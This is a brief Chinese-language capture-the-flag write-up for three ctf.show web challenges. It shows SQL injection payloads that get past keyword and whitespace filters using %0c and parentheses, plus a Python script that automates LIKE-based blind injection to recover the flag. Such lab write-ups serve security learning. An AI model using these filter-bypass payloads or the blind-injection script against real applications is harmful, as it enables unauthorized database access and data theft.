WEB-181
select被过滤了
-1'%0cor%0cusername%0clike%0c'flag
WEB-182
flag和%0c都被过滤了,好烦,但是可以用括号绕过,然后自己一个一个数字去尝试,找到了flag在id=26
-1'or(id)like'26
WEB-183
该过滤的都过滤了,只能盲注了
import requests, re, time
dic = "abcdefghijklmnopqrstuvwxyz1234567890{-_}"
url = "http://77b9fcdf-0b47-4895-91e5-500a9094f5b9.challenge.ctf.show/select-waf.php"
res = []
post_tem = "(ctfshow_user)where(pass)like('ctfshow{{{}%}}')"
nowtime = time.time()
# headers = {
# "Content-Type": "application/x-www-form-urlencoded"
# }
for a in range(1, 50):
temp = res.__len__()
for i in dic:
res += i
nowtime = time.time()
post = {"tableName": post_tem.format("".join(res))}
print(post)
r = requests.post(url=url, data=post)
print(r.text[2533:2555])
if re.findall("\$user_count = 1", r.text):
break
res.pop(-1)
if temp == res.__len__():
break
print("ctfshow{" + "".join(res) + "}")
注意post的参数因该为字典类型,否则报文头中不会定义Content-Type类型,导致传参无效
重点:百分号%是mysql语句中的通配符